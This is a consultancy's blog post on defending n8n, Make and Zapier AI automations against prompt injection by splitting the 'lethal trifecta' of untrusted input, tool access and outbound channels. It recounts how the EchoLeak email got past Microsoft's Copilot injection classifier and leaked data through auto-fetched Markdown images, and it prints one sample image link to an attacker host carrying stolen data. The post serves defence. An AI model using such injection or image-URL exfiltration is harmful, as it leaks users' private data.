Workflow AutomationAI AgentsSecurityn8n

Prompt injection in AI automations: the real fix

You cannot reliably block prompt injection by filtering input; EchoLeak bypassed Microsoft's own dedicated classifier. The durable fix is structural: design the flow so no single AI step ever holds all three legs of the lethal trifecta at once (reading untrusted content, access to private data or tools, the ability to send data out), then cut whichever leg is cheapest in each pattern.

Alexey YushkinFounder, GENERAL INFORMATICS3 min read

You cannot sanitize your way out of prompt injection. In June 2025, a single crafted email pulled data out of Microsoft 365 Copilot in a zero-click attack named EchoLeak (CVE-2025-32711, rated CVSS 9.3), and it did that by slipping past Microsoft's own purpose-built prompt-injection classifier. If a dedicated filter from a company that size can be bypassed by an email worded to look ordinary, the "add a detection node" advice in most n8n and Zapier security tutorials will not hold either. The durable fix is not a better filter. It is structural: design your automation so that no single AI step ever has all three of the things an attacker needs at the same time.

Those three things have a name. Simon Willison, the engineer who formalized prompt injection, calls them the lethal trifecta: access to private data, exposure to untrusted content, and the ability to communicate externally. Hold all three in one step and you are exploitable by design. Hold only two and the attack has nowhere to go.

Why filtering does not stop prompt injection

Prompt injection is not a syntax bug. With SQL injection you escape quotes, because the dangerous characters are a finite, known set. Prompt injection is a natural-language attack, and there is no character to escape. The model reads your system prompt, the user's input, retrieved documents, and tool results as one merged stream of text, and when those signals conflict it has to guess which to obey. OWASP ranks this as LLM01, the number one risk in its 2025 list for LLM applications, and states the core reason plainly: models cannot currently tell trusted instructions apart from untrusted content.

EchoLeak is the proof that filtering is a soft control. Microsoft runs a classifier called XPIA (Cross Prompt Injection Attempt) specifically to catch injected instructions inside Copilot's context. The attack got past it by phrasing the hidden instructions to read like a normal message to a human, then chained a few more bypasses to move data out. No user clicked anything. The lesson for anyone building automations is not "Microsoft was careless." It is the opposite. They had a dedicated filter and a security team, and the structural exposure still beat the filter. Treat detection as a speed bump, not a wall.

The lethal trifecta, translated to a no-code flow

Strip the security-conference language and the three legs map cleanly onto an n8n, Make, or Zapier flow.

Untrusted content is any text your automation reads that an outsider could have written. An inbound support email, a website chat message, a web page you scrape, a PDF a vendor sent, a form's free-text field, a review you pulled in. If a stranger can put words in front of your model, that is the leg.

Private data or tools is anything the step can reach that you would not want published. A CRM lookup, an order database, an API key, a "send email" action, a calendar, a file store. In practice this leg arrives the moment you give a model tools, which is exactly the runtime tool-choice question behind whether you need an MCP server. The more tools a model can call, the heavier this leg.

The ability to send data out is any path by which information can leave. The obvious ones are an email send, an HTTP request, a Slack post. The non-obvious one, which catches people, is the model's own output landing somewhere that renders links or images. More on that below, because it is the leg operators forget they have.

Which of your automations already have all three legs

Here are seven patterns operators actually build, scored on each leg. The ones with all three are not hypothetically risky. They are the EchoLeak shape.

AutomationReads untrusted contentHas private data or toolsCan send data outAll three
AI auto-replies to inbound support emailYes, the emailYes, CRM and order lookupYes, sends the replyYes
AI booking agent in a website chatYes, visitor messagesYes, calendar and CRMYes, confirmation and bookingYes
AI research agent browses the web, emails you a digestYes, web pagesYes, your context and toolsYes, the emailYes
AI summarizes an inbound email into a Slack channelYes, the emailLimited, just that emailYes, posts to SlackIn disguise, see below
AI tags inbound messages into a fixed label setYes, the messageNo tools, no secretsNo, writes one enum valueNo, one leg
AI extracts fields from a vendor PDF into your databaseYes, the PDFWrites to your DB onlyNo external sendNo, two contained legs
AI drafts outbound copy from your own internal docsNo, your own dataYesYes, you sendNo, missing the untrusted leg

The top three rows are the canonical full-trifecta builds, and the booking agent is worth calling out because it is so common. A chat agent that reads visitor messages, holds calendar and CRM tools, and sends confirmations is the textbook case, which is also why the named failure modes in the appointment-booking chatbot teardown matter for security and not just reliability.

The Slack-summary row is the trap. It looks like two legs, because the model only sees one email and has no CRM. But "posts to Slack" is an outbound channel, and if that channel auto-renders links or images written by the model, the third leg is live and you did not notice it.

Cut the cheapest leg: the fix per pattern

You do not need to defeat prompt injection. You need to remove one leg, and one leg is almost always cheap to remove without changing what the automation does for the user. Pick the cheapest.

Leg to cutHow you cut itWhen it is cheapest
Untrusted contentPre-extract with a toolless model into structured fields, then pass only the fields to any step that has tools. The tool-holding step never sees raw attacker text.When the downstream step only needs a few values, not the full message.
Private data and toolsGive the step that reads untrusted content zero tools, no API keys, no DB writes. It returns text or a label only. A separate deterministic step acts.Almost always. This is the default that should have been the default.
Send capabilityThe untrusted-reading step cannot trigger an outbound action with a model-chosen destination. Hardcode the recipient, or route through a human gate.When the outbound destination is fixed (always the same Slack channel, always the customer who wrote in).

Two specifics make this concrete. First, constrain the output. If the step that reads the message can only return one value from an enum like urgent, normal, or spam, a hijacked model cannot encode your customer list into that field. Constrained outputs (OpenAI Structured Outputs, Anthropic tool use) close the send leg on any classify-or-extract step, which is the same reason to push the model early and narrow in the AI-versus-rule decision. The model reads the mess and picks from your list. The rule does everything after.

Second, never let the model choose the recipient or the URL of a send action. If the automation emails a reply, the "to" address comes from the verified inbound sender record, not from anything the model wrote. If it posts a webhook, the endpoint is a hardcoded value in the node, not a field the model can fill. The moment a model picks where data goes, you have handed the attacker the steering wheel. For the cases where an outbound action is genuinely high-stakes and reversible-only-by-apology, that send belongs behind a human-approval gate rather than firing unattended.

The exfiltration channel operators forget

EchoLeak did not move data out through an obvious "send" tool. It used reference-style Markdown and auto-fetched images, encoding the stolen data into a URL that the rendering surface fetched automatically, routed through a Microsoft Teams proxy that the content security policy already trusted. The data left because a display surface auto-loaded an image the model had written.

This is the leg that the Slack-summary automation has and you did not count. Your AI output lands in Slack, Notion, a Telegram bot, an email client, an internal dashboard. If any of those auto-renders an image or follows a link the model produced, the model can place stolen data inside that URL and the render fires the request. No "send email" node required. The output surface is the send leg.

Two defenses. Strip or escape Markdown links and images from model output before it lands anywhere that auto-renders, so a model-written ![](http://attacker/?data=...) becomes inert text. And treat retrieved and scraped content as untrusted at the same level as direct user input, because OWASP's indirect-injection category is exactly the hidden instruction sitting inside a document your flow happened to read. A page in your own vector store is not safe because it is yours. It is safe only if you trust everyone who can write to it.

What to do next

Open your most exposed automation, the one that reads something a stranger wrote and can act on it, and score it on the three legs out loud. Does an AI step read untrusted content. Does that same step have tools or secrets. Can that same step cause data to leave, including through a surface that auto-renders its output. If you count three, you have an EchoLeak-shaped flow, and the fix is not a filter. Split the step. Let a toolless model read the untrusted text and return a constrained label or a few clean fields, then let a deterministic rule with a hardcoded destination do the acting.

We build workflow automation systems and the AI agents and assistants we ship on this separation by default: the model that touches anything a stranger wrote never also holds the keys and the outbound channel. If you want a second set of eyes on a flow that reads inbound mail, chats, or scraped content, send us the flow and we will mark where the three legs meet and which one is cheapest to cut.

Frequently Asked Questions

SOURCES & CITATIONS

  1. The lethal trifecta for AI agents: private data, untrusted content, and external communication Simon Willison's Webloghttps://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
  2. LLM01:2025 Prompt Injection OWASP Gen AI Security Projecthttps://genai.owasp.org/llmrisk/llm01-prompt-injection/
  3. Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data Without User Interaction The Hacker Newshttps://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html
  4. EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System arXivhttps://arxiv.org/abs/2509.10540

About Alexey Yushkin

Alexey is the founder of GENERAL INFORMATICS LLC. He designs and ships AI and automation systems for businesses and operators across the US.

Related reading

Want this kind of system in your business?

We build practical AI and automation systems for operators. Send us your current workflow and we will show you what to automate first.

Request a Workflow Review